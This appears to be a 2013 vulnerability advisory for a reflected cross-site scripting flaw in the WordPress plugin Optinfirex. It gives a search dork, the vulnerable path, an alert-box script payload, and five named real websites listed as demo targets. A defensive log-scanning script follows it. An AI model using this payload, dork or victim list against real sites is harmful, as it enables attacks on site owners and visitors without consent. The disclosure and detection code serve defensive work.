The third-party WordPress plugin Optinfirex suffers from a cross-site scripting vulnerability. Note that this advisory has site-specific information.
406b64a71217b4d7101b4e75837a87536ec5f4df1b52cca998fe666d372c6537
#********************************************************************************
# Exploit Title : WordPress optinfirex plugin Cross site scripting
#
# Exploit Author : Ashiyane Digital Security Team
#
# Vendor Homepage : http://wordpress.org
#
# Google Dork : inurl :wp-content/plugins/optinfirex
#
# Date: 2013-11-26
#
# Tested on: Windows 7 , Linux
-------------------------------------------------------------------
# Exploit : Cross site scripting
#
# Location : [Target]wp-content/plugins/optinfirex/lp/index.php?id=[xss]
#
# Script For Test : "/><script>alert(1);</script>
######################
# Demo:
#
# http://www.avantmedispa.com/wp-content/plugins/optinfirex/lp/index.php?id=
"/><script>alert(1);</script>
#
# http://www.inquestgroup.com/wp-content/plugins/optinfirex/lp/index.php?id=
"/><script>alert(1);</script>
#
# http://www.drvictorchan.com/wp-content/plugins/optinfirex/lp/index.php?id=
"/><script>alert(1);</script>
#
# http://www.obxwellness.com/wp-content/plugins/optinfirex/lp/index.php?id=
"/><script>alert(1);</script>
#
# http://www.weightlosstips101.org/wp-content/plugins/optinfirex/lp/index.php?id=
"/><script>alert(1);</script>
#
######################
discovered by : ACC3SS
######################
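
Added example for defenders (not part of the original advisory and not the plugin's code): a log check that flags requests to the lp/index.php location named above whose id parameter is not a plain token. The allowed id format, the Combined Log Format layout and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Path and parameter come from the advisory's "Location" line.
VULN_PATH = "wp-content/plugins/optinfirex/lp/index.php"
PARAM = "id"
# Assumption: legitimate id values are short alphanumeric tokens.
SAFE_ID = re.compile(r"[A-Za-z0-9_-]{1,64}")
# Client address and request target from a Combined Log Format line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Dec/2013:10:00:00 +0000] "GET /wp-content/plugins/optinfirex/lp/index.php?id=42 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Dec/2013:10:00:05 +0000] "GET /wp-content/plugins/optinfirex/lp/index.php?id=%22/%3E%3Cscript%3Ealert(1);%3C/script%3E HTTP/1.1" 200 5170',
    '203.0.113.5 - - [01/Dec/2013:10:00:09 +0000] "GET /wp-content/plugins/optinfirex/lp/index.php?id=%2522%252F%253E HTTP/1.1" 200 5150',
    '192.0.2.10 - - [01/Dec/2013:10:00:12 +0000] "GET /index.php?id=%3Cb%3E HTTP/1.1" 200 100',
]

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (%2522 -> %22 -> "), bounded to a few rounds."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(log_lines):
    """Return (client_ip, decoded_id) for plugin requests whose id is not a plain token."""
    hits = []
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target = m.groups()
        parts = urlsplit(target)
        if VULN_PATH not in fully_decode(parts.path).lower():
            continue
        # Split on "&" only, so the ";" inside a payload stays in the value.
        for pair in parts.query.split("&"):
            name, _, raw = pair.partition("=")
            value = fully_decode(raw)
            if unquote(name) == PARAM and not SAFE_ID.fullmatch(value):
                hits.append((ip, value))
    return hits

if __name__ == "__main__":
    print(suspicious_requests(SAMPLE_LOG))
```

An empty or missing-value id is also reported, since it does not match the assumed token format.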